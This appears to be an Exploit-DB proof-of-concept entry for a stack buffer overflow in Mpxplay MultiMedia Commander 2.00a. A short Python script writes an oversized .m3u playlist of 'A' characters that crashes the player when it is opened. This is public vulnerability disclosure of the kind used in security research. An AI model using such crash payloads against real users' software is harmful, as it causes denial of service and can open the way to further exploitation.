Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow (PoC)

EDB-ID:

38053

CVE:



Author:

Un_N0n

Type:

dos


Platform:

Windows

Date:

2015-09-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

********************************************************************************************
# Exploit Title: Mpxplay Multimedia Commander Stack-based BOF
# Date: 9/1/2015
# Exploit Author: Un_N0n
# Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity
# Version: V2.00a
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'mpxp_mmc.exe'.
2- Browser Crash.m3u in audio player.
~ Software will Crash.

[Code to produce crash.txt]: 
junk = "A"*66666
file = open("CRASH.m3u",'w')
file.write(junk)
file.close()
**********************************************************************************************